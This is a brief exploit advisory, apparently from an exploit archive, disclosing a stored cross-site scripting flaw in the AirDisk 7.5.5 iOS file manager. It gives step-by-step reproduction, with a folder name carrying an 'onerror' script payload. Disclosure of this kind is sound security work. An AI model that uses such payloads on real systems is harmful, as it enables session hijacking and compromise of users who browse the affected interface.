AirDisk 7.5.5 Cross Site Scripting

AirDisk version 7.5.5 suffers from a persistent cross site scripting vulnerability.


SHA-256 | 5c2171b386d4185c2d365152bd1f99a0e03692cfe0babd1487055e726dd594e8

# Exploit Title: AirDisk 7.5.5 File Manager Stored XSS
# Date: Sep 8, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://apps.apple.com/us/developer/felix-yew/id505904424
# Software Link:
https://apps.apple.com/us/app/airdisk-file-manager/id566530748
# Version: 7.5.5
# Tested on: iPhone ios 15.6

1/ Starting the server ( File Transfer > Wi-fi File Transfer )

2/ Go to browser

3/ Enter the address showing on app eg: http://192.168.1.187:8080

4/ Create a folder with the name: rose'"><img src=x
onerror=alert(document.location)>

5/ Refresh.

Related Posts